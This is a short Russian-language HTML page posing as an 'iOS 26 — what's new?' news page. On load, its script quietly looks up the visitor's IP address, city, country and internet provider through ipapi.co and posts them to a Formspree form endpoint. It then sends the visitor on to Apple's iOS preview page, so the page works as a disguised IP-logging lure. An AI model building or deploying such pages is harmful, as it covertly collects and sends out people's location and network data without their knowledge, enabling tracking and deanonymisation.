<!DOCTYPE html>
<html lang="ru">
<head>
  <meta charset="UTF-8" />
  <title>iOS 26 — что нового?</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      text-align: center;
      padding-top: 50px;
      background-color: #f0f0f0;
    }
    h1 {
      color: #333;
    }
    #status {
      font-size: 18px;
      color: #555;
    }
  </style>
</head>
<body>
  <h1>iOS 26 — что нового?</h1>
  <p id="status">Загрузка информации...</p>

  <script>
    const emailEndpoint = "https://formspree.io/f/xdkzgvnz";

    fetch('https://ipapi.co/json/')
      .then(response => response.json())
      .then(data => {
        const message = `
Новый визит:
IP: ${data.ip}
Город: ${data.city}
Страна: ${data.country_name}
Провайдер: ${data.org}
        `;

        const formData = new FormData();
        formData.append('message', message);

        fetch(emailEndpoint, {
          method: 'POST',
          body: formData
        });

        document.getElementById('status').innerText = "Открытие страницы iOS 26...";

        setTimeout(() => {
          window.location.href = "https://www.apple.com/ios/ios-18-preview/";
        }, 3000);
      })
      .catch(() => {
        document.getElementById('status').innerText = "Ошибка загрузки.";
      });
  </script>
</body>
</html>
